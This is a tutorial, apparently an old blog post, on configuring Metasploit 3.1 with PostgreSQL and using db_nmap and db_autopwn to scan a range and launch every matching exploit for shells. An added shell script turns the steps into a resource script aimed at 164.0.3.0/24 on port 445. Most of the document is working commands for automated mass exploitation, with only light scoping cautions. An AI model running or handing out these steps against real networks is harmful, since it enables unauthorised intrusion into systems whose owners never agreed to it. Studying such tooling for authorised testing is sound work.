autopwn - automated execution of exploits. Rooting will be much easier for us! At least for me, but with no luck: I never managed to get a shell.
This tutorial is based on Fedora 9.
Let's start. What do we need?
- PostgreSQL - yum install postgresql-server (the server package; the client tools come with it)
- Metasploit Framework - the 3.1 tree (we update it with svn below)
- Brain - yum install brain <> (sadly, no such package)
First, start the postgresql service (/sbin/service postgresql start). On a fresh install the database cluster has to be initialised before the first start (/sbin/service postgresql initdb); the database user and database themselves are set up below. Metasploit 3 uses the ActiveRecord module (part of Ruby on Rails) to provide an object-oriented interface to an arbitrary database service. Here are the steps:
gem install activerecord
gem install postgres (we use PostgreSQL as our database; the Ruby gem itself is called postgres, which is what the check below loads)
Verify the installation. A successful check prints nothing at all; any output is an error:
$ ruby -e 'require "rubygems"; require "postgres"'
Update your framework: change to the framework directory and run
svn update
PostgreSQL: create the database. Make sure postgresql is running first, then switch to the postgres superuser account and open psql:
# su - postgres
$ psql -d template1 -U postgres
Output:
Welcome to psql 7.4.16, the PostgreSQL interactive terminal.
Type: \copyright for distribution terms
\h for help with SQL commands
\? for help on internal slash commands
\g or terminate with semicolon to execute query
\q to quit
template1=#
Next, create the role Metasploit will connect as, the database, and grant the role access to it. Note the direction of the GRANT: privileges are granted ON the database TO the role (choose a real password instead of 'myPassword').
template1=# CREATE USER root WITH PASSWORD 'myPassword';
template1=# CREATE DATABASE metasploit3;
template1=# GRANT ALL PRIVILEGES ON DATABASE metasploit3 TO root;
template1=# \q
Done with the PostgreSQL side. Change to the framework directory and type ./msfconsole. You now have the Metasploit console:
[root@localhost framework-3.1]# ./msfconsole
=[ msf v3.1-release
+ -- --=[ 268 exploits - 118 payloads
+ -- --=[ 17 encoders - 6 nops
=[ 46 aux
msf >
In the console, type:
load db_postgres
db_create (you will see several NOTICE messages from PostgreSQL; ignore them)
db_hosts (should run without an error message, which means the connection to PostgreSQL is working; the host list is empty until you scan)
db_nmap 164.0.3.* (change the range to your target; every host and open port nmap finds is stored in the database. You can also pass nmap options, e.g. db_nmap -p 445 164.0.3.*, which records only hosts that expose the SMB port, and keeps the scan, and later db_autopwn -p, focused on that service)
Done with our scanning. The fun part begins! But before that, take a look at the db_autopwn options.
msf > db_autopwn
[*] Usage: db_autopwn [options]
-h Display this help text
-t Show all matching exploit modules
-x Select modules based on vulnerability references
-p Select modules based on open ports
-e Launch exploits against all matched targets
-s Only obtain a single shell per target system (NON-FUNCTIONAL)
-r Use a reverse connect shell
-b Use a bind shell on a random port
-I [range] Only exploit hosts inside this range
-X [range] Always exclude hosts inside this range
Launch our attack!
db_autopwn -p -t -e
This matches exploit modules against the open ports recorded by db_nmap (-p), lists the matches (-t) and launches them all (-e). It will take time, so wait. Bear in mind that this fires every matching module at every host in the database, so restrict it with -I / -X to the hosts you are allowed to hit, and use -r if the targets cannot accept a bind shell through a firewall. If you are lucky enough, you will get a shell.
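The whole sequence, typed by hand above, as an added shell example that is not from the original post: it writes the psql setup as a file (with the GRANT in the correct direction), writes the msfconsole commands as a resource script with a dry run (-t) before the launch (-e, scoped with -I), and refuses a target range that is not a well-formed /24. It assumes a database role named msf, the database name metasploit3, the post's range 164.0.3.0/24 and port 445, that msfconsole accepts a file of console commands via -r, and that -I takes the same CIDR form as nmap; if your msfconsole has no -r, paste the generated lines at the msf> prompt instead.

```shell
#!/bin/sh
# Added example, not from the original post. Generates the two artefacts the
# walkthrough types by hand so they can be reviewed before anything runs.
# Assumed names: DB role "msf", database "metasploit3", range 164.0.3.0/24,
# port 445; msfconsole -r and db_autopwn -I <cidr> are assumed to work as in
# the lead-in.

# SQL for the postgres superuser session. The GRANT must read
# "ON DATABASE <db> TO <role>"; the post has the two names swapped.
pg_setup_sql() {
    user="$1"; db="$2"; pass="$3"
    printf "CREATE USER %s WITH PASSWORD '%s';\n" "$user" "$pass"
    printf "CREATE DATABASE %s OWNER %s;\n" "$db" "$user"
    printf "GRANT ALL PRIVILEGES ON DATABASE %s TO %s;\n" "$db" "$user"
}

# Console commands in the order the walkthrough runs them. The first
# db_autopwn is a dry run (-t lists matching modules, no -e); the second
# launches, restricted with -I to the scanned range only.
msf_rc() {
    range="$1"; port="$2"
    cat <<EOF
load db_postgres
db_create
db_hosts
db_nmap -p $port $range
db_autopwn -p -t
db_autopwn -p -e -I $range
EOF
}

# Scope guard: accept only a dotted IPv4 /24 (x.y.z.0/24) with each octet in
# 0-255, so a typo or a stray wildcard cannot widen the scan or the attack.
valid_slash24() {
    r="$1"
    case "$r" in
        *.*.*.0/24) ;;
        *) return 1 ;;
    esac
    IFS=./ read -r a b c d e <<EOF
$r
EOF
    for o in "$a" "$b" "$c"; do
        case "$o" in
            ''|*[!0-9]*) return 1 ;;
        esac
        [ "$o" -le 255 ] || return 1
    done
    return 0
}

main() {
    range="${1:-164.0.3.0/24}"
    valid_slash24 "$range" || { echo "refusing range: $range" >&2; return 2; }
    pg_setup_sql msf metasploit3 "${PGPASS:-myPassword}" > setup.sql
    msf_rc "$range" 445 > autopwn.rc
    echo "wrote setup.sql and autopwn.rc"
    echo "next: su - postgres -c 'psql -d template1 -U postgres -f setup.sql'"
    echo "then: ./msfconsole -r autopwn.rc"
}

main "$@"
```

Run it once with the range as the only argument, review autopwn.rc, and only then feed it to msfconsole; the dry-run line shows which modules db_autopwn would fire before the -e line commits to them.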
References:
- PostgreSQL: add or create a user account and grant permission for a database
- http://blog.metasploit.com/2006/09/metasploit-30-automated-exploitation.html
Cheers~